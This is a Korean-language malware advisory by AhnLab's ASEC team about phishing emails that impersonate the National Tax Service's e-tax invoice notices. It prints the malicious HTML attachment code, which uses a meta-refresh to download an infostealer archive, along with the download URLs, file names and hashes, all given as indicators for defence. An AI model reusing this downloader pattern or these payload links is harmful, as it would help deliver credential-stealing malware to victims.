본문 바로가기
악성코드 정보

국세청 '전자세금계산서' 사칭 악성코드 유포

by AhnLab ASEC 분석팀 2020. 8. 18.

ASEC 분석팀은 최근 국내 이메일을 통한 악성코드 유포 사례를 모니터링 하던 중, 국세청 전자세금계산서 발급 메일을 사칭하여 정보유출 형 악성코드가 유포 중인것을 확인하였다. 아래의 그림은 공격에 사용된 메일로 국세청에서 정상적으로 특정 사업자에게 발송된 것으로 위장한 것을 알 수 있다. 이메일의 첨부파일은 "NTS_eTaxInvoice.html" 로 스크립트 파일 형식이다.

 

국세청 사칭 메일내용

 

해당 HTML 파일을 실행 시, 특정 사이트로 접속하여 2차 악성파일(*.img)을 다운로드 받는 구조이다.

 

(사례-1)

<HTML xmlns:o = "urn:schemas-microsoft-com:office:office"><HEAD>
<META name=GENERATOR content="MSHTML 11.00.10570.1001"></HEAD>
<BODY>
<P style="FONT-FAMILY: &#65533;s&#65533;&#1257;&#65533;&#65533;&#65533;, Arial; COLOR: rgb(0,0,0); MARGIN: 0cm 0cm 0pt; LINE-HEIGHT: 10pt" align=center><IMG border=0 hspace=0 alt=" inquiry" src="https://i.ibb.co/CKzBnpM/Koria-gif1-Untitled.gif"><BR></P>
<META content=1;url=https://cdn.discordapp.com/attachments/737847165568942094/743329581519601754/NTS_eTaxInvoice.img?e=H9iaRf http-equiv=refresh></BODY></HTML>

 

(사례-2)

<a href="https://gifyu.com/image/c8B5"><img src="https://s7.gifyu.com/images/Korian-Tax-Invoice-direct-link-Image.gif" alt="Korian-Tax-Invoice-direct-link-Image.gif" border="0" /></a>P style="FONT-FAMILY: &#65533;s&#65533;&#1257;&#65533;&#65533;&#65533;, Arial; COLOR: rgb(0,0,0); MARGIN: 0cm 0cm 0pt; LINE-HEIGHT: 10pt" align=center><IMG border=0 hspace=0 alt=" inquiry" src="https://ibb.co/Gtj1RGw?width=825&height=395"><BR></P>
<META content=1;url=https://1drv.ws/u/s!AmUcc0yrXDZQa9fBEFywhT3Wu1Y?e=nxK818?e=H9iaRf http-equiv=refresh></BODY></HTML>

 

 

[다운로드 주소]

  • https://cdn.discordapp.com/attachments/737847165568942094/743329581519601754/NTS_eTaxInvoice.img 
  • https://1drv.ws/u/s!AmUcc0yrXDZQa9fBEFywhT3Wu1Y

 

스크립트 파일에 의해 다운로드 된 "NTS_eTaxInvoice.img" 파일은 압축형식의 파일로 내부에는 아래의 그림과 같이 PDF 문서로 위장한 실행파일(*.exe)이 존재하며, 해당 파일은 정보유출 기능의 악성코드로 확인되었다.

 

IMG 압축파일 내부의 실행파일

 

[유포파일 이름]

  • NTS_eTaxInvoice.exe
  • NTS_eTaxInvoice.scr
  • scan-12-08-2020-New_PO IMG-Updated.exe

최근 국내에는 이러한 국세청을 사칭한 공격 외에도 견적서, 이력서를 가장한 이메일 공격이 활발하게 진행되고 있다. 출처가 불분명한 메일 및 첨부파일에 대해서는 사전에 백신 프로그램을 이용한 검사가 필요하다.

 

[V3 진단]

  • Downloader/Win32.Agent.C4180520 (엔진버전: 2020.08.14.03)
  • Trojan/Win32.Infostealer.C4182634 (엔진버전: 2020.08.19.00)

 

[관련 IOC 정보]

  • https://cdn.discordapp.com/attachments/737847165568942094/743329581519601754/NTS_eTaxInvoice.img 
  • https://1drv.ws/u/!AmUcc0yrXDZQa9fBEFywhT3Wu1Y
  • MD5: 9c23c0cc13e4df0fc7d17e54cdfb286b (exe)
  • MD5: 5a1dbe631249d5b4a22f94777ad5b104 (exe)

 

댓글0